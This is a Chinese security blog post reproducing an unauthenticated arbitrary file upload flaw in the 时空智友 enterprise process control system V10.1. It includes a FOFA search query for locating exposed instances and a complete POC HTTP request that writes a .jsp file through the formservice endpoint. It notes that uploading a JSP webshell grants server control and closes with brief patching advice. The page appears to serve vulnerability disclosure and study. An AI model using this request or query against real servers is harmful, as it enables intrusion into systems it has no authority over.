时空智友企业管控系统文件上传漏洞复现

最新推荐文章于 2024-07-10 08:25:12 发布
最新推荐文章于 2024-07-10 08:25:12 发布
阅读量458 收藏 1
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/132984582
版权

前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!

一、产品简介

时空智友企业流程化管控系统是一款企业信息管理软件,致力于协助大健康企业构建内部信息化,解决GSP管理、多组织管理、财务管理、税控管理、线上线下一体化等问题。 该系统可以帮助企业实现流程化管控,提高工作效率和管理水平。

二、漏洞描述

时空智友企业流程化管控系统 formservice接口处存在任意文件上传漏洞,未经认证的攻击者可通过此接口上传后门文件,最终可导致服务器失陷。

三、影响范围

时空智友 V10.1

四、复现环境

FOFA:app=“时空智友V10.1”

五、漏洞复现

1.访问存在漏洞的网站,抓包
在这里插入图片描述

2.POC

POST /formservice?service=attachment.write&isattach=false&filename=c.jsp HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 3

ccc

3.访问http://your-ip/form/temp/回显的文件名,成功
在这里插入图片描述

在这里插入图片描述

六、漏洞利用

直接上传jsp马,即可获得服务器权限,这里不再演示

七、修复建议

限制外网访问此系统,更新系统至安全版本

参考链接

https://blog.csdn.net/qq_41904294/article/details/132419148

明丨通
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【1day】复现海康威视综合安防管理平台前台任意文件上传漏洞
记录并分享学习安全的知识点..
07-07 1747
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视isecure center 综合安防管理平台存在任意文件上传漏洞
浙大恩特客户资源管理系统任意文件上传漏洞复现
0xSec
11-10 1583
浙大恩特客户资源管理系统中fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件上传漏洞,未经身份认证的攻击者可以上传任意后门文件,最终可导致服务器失陷。
漏洞复现空智ERP——uploadStudioFile——任意文件上传
最新发布
LongL_GuYu的博客
07-10 620
空智ERP是专为医药等行业设计的综合性企业资源规划系统,融合云计算和移动技术,支持多组织管理。。其uploadStudioFile接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件到服务器上,包括木马后门文件,导从而获取服务器权限。
空智企业流程化管控系统文件上传漏洞
qq_36334672的博客
01-26 217
空智企业流程化管控系统存在文件上传漏洞
(新接口)空智 ERP upload 文件上传漏洞
weixin_43167326的博客
06-26 243
空智ERP是一款基于云计算和大数据技术的企业资源计划管理系统。该系统旨在帮助企业实现数字化转型,提高运营效率、降低成本、增强决策能力和竞争力,空智ERP系统涵盖了企业的各个业务领域,包括财务管理、供应链管理、生产计划、库存管理、人力资源管理、客户关系管理等。该系统具有强大的数据分析和报表功能,能够为企业提供实的数据洞察和业务智能,帮助企业更好地应对市场变化和竞争压力。
空智企业信息管理系统任意文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-07 553
空智企业信息管理系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。空智企业信息管理系统存在任意文件读取漏洞,攻击者可以在未授权的情况下读取系统上的文件。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
易思智能物流无人值守系统文件上传漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-11 261
智能物流无人值守是针对流程生产企业原料采购、产成品销售及厂内物流的统一管控智能信息化平台。目的:全企业产供销业务的集成管理,无人值守计量、降本增效、机器替代人工,优化物流资源管控体系。该系统5.0版本/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞没有人规定,一朵花一定要成长为向日葵或者玫瑰。
文件上传漏洞的思维导图
04-19
文件上传漏洞网络安全领域中的一个重要话题,主要涉及服务器上的文件管理与权限控制。攻击者通过这类漏洞能够上传恶意文件,从而可能对系统造成严重破坏,包括执行任意代码、获取敏感信息甚至完全控制服务器。以下...
基于Springboot2.x的文件上传下载管理系统设计源码
04-06
本项目是一个基于Springboot2.x的文件上传下载管理系统,包含73个文件,主要文件类型包括Java源代码、图片、JavaScript脚本、XML配置文件、Git忽略文件、LICENSE文件、Markdown文档、SQL数据库文件、CSS样式表和图标...
Free-Fs 开源文件管理系统
04-30
包含文件上传、删除、在线预览、云资源列表查询、下载、文件移动、重命名、目录管理、登录、注册、以及权限控制等功能。 ## 项目结构 ``` ##情链接 - [EleAdmin] 通用型后台管理模板,界面美观、开箱即用拥有丰富...
netcore分块上传服务, netcore分布式文件上传系统
05-30
netcore分块上传服务, netcore分布式文件上传系统。统一文件上传服务:前端直接上传,使用jwt和origin做权限控制,分块上传,支持多个项目上传; aspnetcore分布式上传文件系统;由于公开的是http接口,所以任何...
海康威视iVMS综合安防系统文件上传漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-02 517
海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
华天OA任意文件上传漏洞 复现
薛定谔嘚喵博客
10-09 652
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。该OA系统存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器的敏感信息。
亿某通电子文档安全管理系统任意文件上传漏洞 CNVD-2023-59471
afei001
09-20 1089
亿某通电子文档安全管理系统是一款电子文档安全防护软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产。亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。
【0day】复现空智企业流程化管控系统wc.db数据库文件泄露漏洞
记录并分享学习安全的知识点..
11-22 365
空智企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。空智企业流程化管控系统存在任意文件读取漏洞,攻击者攻击者可以在未经授权的情况下读取系统上的任意文件。空智企业流程化管控系统存在wc.db数据库文件泄露,可根据泄露信息,进行下一步利用。
漏洞复现】蓝凌EIS智慧协同平台saveImg接口存在任意文件上传
失心少年
10-23 397
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!蓝凌智慧协同平台满足组织企业在知识、协同及项目管理系统中建设等需求。该平台在saveImg接口处存在任意文件上传,攻击者可通过该漏洞上传Weshell控制服务器。1.利用如下POC进行POST请求上传文件。
空智企业信息管理系统 sql注入漏洞
09-20
空智企业信息管理系统是一种企业级的信息管理系统,它用于帮助企业管理各种业务数据和信息。然而,该系统存在SQL注入漏洞,这可能导致安全风险和数据泄露。 SQL注入是一种针对Web应用程序的常见安全威胁。它发生在应用程序未能正确过滤用户输入的情况下。攻击者可以通过构建恶意的SQL查询,利用这个漏洞来执行未授权的数据库操作,甚至是获取未经授权的敏感数据。 针对空智企业信息管理系统的SQL注入漏洞,我们需要采取以下措施来修复和防止此安全风险的发生: 1. 安全评估和漏洞扫描:对系统进行全面的安全评估,包括检查SQL注入漏洞。使用漏洞扫描工具定期扫描系统以及及修复和更新漏洞。 2. 输入验证与过滤:所有用户输入数据都必须进行验证和过滤,以防止恶意用户输入带有特殊字符的SQL查询。可以使用参数化查询或预编译语句来减少SQL注入的风险。 3. 最小化权限:将数据库的权限设置为最小化,限制访问数据库的用户只能执行必要的操作,减少攻击者利用注入漏洞的可能性。 4. 错误和异常处理:在系统中实施安全的错误和异常处理机制,不向用户显示详细的错误信息,以防止攻击者了解系统结构和敏感信息。 5. 定期更新和维护:及安装和应用官方发布的系统和数据库的补丁和更新,以修复已知的漏洞。 通过以上措施,空智企业信息管理系统的SQL注入漏洞可以被修复和预防,保护系统和企业的数据安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值